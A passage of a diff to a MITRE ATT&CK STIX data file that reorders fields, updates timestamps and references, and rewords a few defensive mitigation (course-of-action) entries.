- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--96913243-2b5e-4483-a65c-bb152ddd2f04",
@@ -178776,8 +206612,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.083Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7a14d974-f3d9-4e4e-9b7d-980385762908",
@@ -178797,8 +206633,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:24:44.818Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178863,8 +206699,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.683Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178914,8 +206750,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.871Z",
"created": "2019-03-14T20:17:16.234Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b",
@@ -178940,8 +206776,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:25:06.552Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b",
@@ -178986,8 +206822,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.440Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179037,8 +206873,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.888Z",
"created": "2019-03-15T14:49:53.983Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d0fcf37a-b6c4-4745-9c43-4fcdb8bfc88e",
@@ -179063,8 +206899,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:28:48.363Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--4320b080-9ae9-4541-9b8b-bcd0961dbbbd",
@@ -179084,8 +206920,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:05:13.374Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee",
@@ -179110,8 +206946,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:05:56.488Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--13cad982-35e3-4340-9095-7124b653df4b",
@@ -179131,8 +206967,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:06:19.932Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7ee0879d-ce4f-4f54-a96b-c532dfb98ffd",
@@ -179177,8 +207013,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.537Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d9727aee-48b8-4fdb-89e2-4c49746ba4dd",
@@ -179223,8 +207059,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.087Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--39706d54-0d06-4a25-816a-78cc43455100",
@@ -179269,8 +207105,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.688Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179285,18 +207121,18 @@
},
{
"description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.",
- "url": "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf",
+ "url": "https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/",
"source_name": "OWASP Top 10 2017"
}
],
"description": "Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.",
- "name": "Defacement Mitigation ",
+ "name": "Defacement Mitigation",
"id": "course-of-action--5d8507c4-603e-4fe1-8a4a-b8241f58734b",
"type": "course-of-action",
- "modified": "2019-07-24T19:09:19.281Z",
+ "modified": "2020-07-14T22:23:56.026Z",
"created": "2019-04-08T17:51:41.510Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d01f473f-3cdc-4867-9e55-1de9cf1986f0",
@@ -179341,8 +207177,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.686Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179382,8 +207218,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:10:48.260Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--910482b1-6749-4934-abcb-3e34d58294fc",
@@ -179428,8 +207264,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:12:02.818Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179479,8 +207315,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:12:36.946Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179520,8 +207356,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:13:31.378Z",
"created": "2019-02-18T17:22:57.941Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179546,8 +207382,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:14:03.948Z",
"created": "2019-02-15T13:04:25.150Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7a4d0054-53cd-476f-88af-955dddc80ee0",
@@ -179587,8 +207423,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:14:33.952Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--dc43c2fe-355e-4a79-9570-3267b0992784",
@@ -179608,8 +207444,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:15:00.897Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--80c91478-ac87-434f-bee7-11f37aec4d74",
@@ -179664,8 +207500,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:15:27.335Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7",
@@ -179710,8 +207546,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.572Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179756,8 +207592,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:16:50.511Z",
"created": "2019-04-22T22:03:26.087Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179797,8 +207633,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:17:09.258Z",
"created": "2019-02-01T14:35:39.565Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179813,10 +207649,10 @@
}
],
"name": "Execution Prevention",
- "description": "Block execution of code on a system through application whitelisting, blacklisting, and/or script blocking.",
+ "description": "Block execution of code on a system through application control, and/or script blocking.",
"id": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"type": "course-of-action",
- "modified": "2020-03-31T13:12:49.325Z",
+ "modified": "2020-06-20T20:11:42.195Z",
"created": "2019-06-11T16:35:25.488Z",
"x_mitre_version": "1.1"
},
@@ -179838,8 +207674,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:18:25.859Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--92c28497-2820-445e-9f3e-a03dd77dc0c8",
@@ -179864,8 +207700,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:19:30.892Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a98be93b-a75b-4dd4-8a72-4dfd0b5e25bb",
@@ -179895,8 +207731,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:20:18.344Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e547ed6a-f1ca-40df-8613-2ce27927f145",
@@ -179926,8 +207762,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:20:50.299Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -179945,7 +207781,7 @@
"description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
"id": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"type": "course-of-action",
- "modified": "2020-03-31T13:13:12.698Z",
+ "modified": "2020-06-20T20:22:55.938Z",
"created": "2019-06-11T17:10:57.070Z",
"x_mitre_version": "1.1"
},
@@ -179967,8 +207803,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:21:22.911Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba",
@@ -180008,8 +207844,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:22:39.193Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31",
@@ -180044,8 +207880,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:23:33.259Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725",
@@ -180080,8 +207916,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:25:39.532Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--92e6d080-ca3f-4f95-bc45-172a32c4e502",
@@ -180116,8 +207952,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:26:18.998Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62",
@@ -180152,8 +207988,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:26:53.547Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2",
@@ -180173,8 +208009,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:27:15.659Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--cba5667e-e3c6-44a4-811c-266dbc00e440",
@@ -180219,8 +208055,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.544Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--515f6584-fa98-44fe-a4e8-e428c7188514",
@@ -180245,8 +208081,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:28:35.941Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d",
@@ -180291,8 +208127,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.685Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da",
@@ -180337,8 +208173,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.248Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1022138b-497c-40e6-b53a-13351cbd4090",
@@ -180383,8 +208219,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.665Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -180429,8 +208265,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.120Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -180448,7 +208284,7 @@
"description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
"id": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"type": "course-of-action",
- "modified": "2019-10-10T15:57:52.418Z",
+ "modified": "2020-06-20T20:46:36.342Z",
"created": "2019-06-11T16:33:55.337Z",
"x_mitre_version": "1.1"
},
@@ -180470,8 +208306,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:31:37.073Z",
"created": "2019-04-26T19:30:33.607Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7009ba4d-83d4-4851-9fbb-e09e28497765",
@@ -180501,8 +208337,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:32:11.883Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158",
@@ -180522,8 +208358,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:32:43.572Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--aaa92b37-f96c-4a0a-859c-b1cb6faeb13d",
@@ -180568,8 +208404,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.325Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -180609,8 +208445,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:34:09.544Z",
"created": "2019-04-24T16:57:19.391Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330",
@@ -180635,8 +208471,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:34:34.065Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f",
@@ -180661,8 +208497,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:35:08.161Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--84d633a4-dd93-40ca-8510-40238c021931",
@@ -180682,8 +208518,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:35:33.631Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43",
@@ -180703,8 +208539,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:36:24.202Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a",
@@ -180724,8 +208560,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:36:50.328Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf",
@@ -180745,8 +208581,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:37:27.850Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739",
@@ -180766,8 +208602,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:37:57.004Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--33f76731-b840-446f-bee0-53687dad24d9",
@@ -180807,8 +208643,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.882Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135",
@@ -180833,8 +208669,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:39:30.292Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--4b998a71-7b8f-4dcc-8f3f-277f2e740271",
@@ -180879,8 +208715,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:40:00.118Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--6cac62ce-550b-4793-8ee6-6a1b8836edb0",
@@ -180900,8 +208736,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:40:27.401Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d",
@@ -180951,8 +208787,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.123Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -181002,8 +208838,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.917Z",
"created": "2019-04-22T13:54:51.385Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8a61f6b9-6b7a-4cf2-8e08-f1e26434f6df",
@@ -181023,8 +208859,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:42:41.375Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c",
@@ -181054,8 +208890,8 @@
"type": "course-of-action",
"modified": "2020-03-31T12:49:14.885Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ec418d1b-4963-439f-b055-f914737ef362",
@@ -181075,8 +208911,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:43:58.738Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a3e12b04-8598-4909-8855-2c97c1e7d549",
@@ -181101,8 +208937,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:44:28.440Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--44155d14-ca75-4fdf-b033-ab3d732e2884",
@@ -181137,8 +208973,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:44:56.371Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--56648de3-8947-4559-90c4-eda10acc0f5a",
@@ -181158,8 +208994,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:45:38.627Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--77fd4d73-6b79-4593-82e7-e4a439cc7604",
@@ -181179,8 +209015,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:45:55.012Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--6e7db820-9735-4545-bc64-039bc4ce354b",
@@ -181200,8 +209036,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:46:16.474Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--54246e2e-683f-4bf2-be4c-d7d5a60e7d22",
@@ -181241,8 +209077,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:46:41.947Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7a6e5ca3-562f-4185-a323-f3b62b5b2e6b",
@@ -181282,8 +209118,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:47:23.978Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13",
@@ -181303,8 +209139,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:47:59.038Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7",
@@ -181324,8 +209160,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:48:23.825Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e333cf16-5bfa-453e-8e6a-3a4c63d6bfcc",
@@ -181345,8 +209181,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:48:43.583Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f",
@@ -181364,7 +209200,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2019-06-11T16:30:16.672Z",
+ "modified": "2020-06-09T20:51:00.027Z",
"created": "2019-06-11T16:30:16.672Z",
"x_mitre_version": "1.0"
},
